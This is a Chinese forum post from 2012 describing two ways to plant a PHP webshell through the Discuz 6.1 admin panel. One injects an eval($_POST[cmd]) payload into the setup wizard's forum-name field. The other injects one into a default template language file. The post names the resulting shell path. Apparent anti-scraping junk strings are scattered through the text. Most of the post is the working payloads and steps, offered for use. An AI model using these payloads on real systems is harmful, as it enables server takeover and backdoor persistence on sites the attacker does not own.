discuz6.1两种方法后台拿shell
+ j3 ]2 m5 _" Z' Y; r# ] F好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
9 M* ~/ V& E, Q! ?& P+ w1:1 c4 X5 {: A' o5 N- p
http://127.0.0.1/discuz/admincp. ... zard&frames=yes$ h! m* W' ^9 H7 D, R. ^
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell, n% o4 J# G9 H
<?php eval($_POST[cmd]);?>' y5 v2 P5 [& y$ k8 Z
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php2 @& h6 l/ f3 d3 I% d3 \
6 ~. P3 G# o# {4 d: n
! a; n9 y4 V2 v1 ?' F2:后台模板管理--默认模板套系--详情
% ^+ H5 \* \. s( y5 ~0 S' i- ^templates/default/actions.lang.php/ o. o! w- K: s n' p+ A4 S
jhackj\\');eval($_POST[cmd])?>;//5 R r/ S! Z5 V- r k3 v2 H
% o6 L0 p# ^; L$ x) D, Y
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对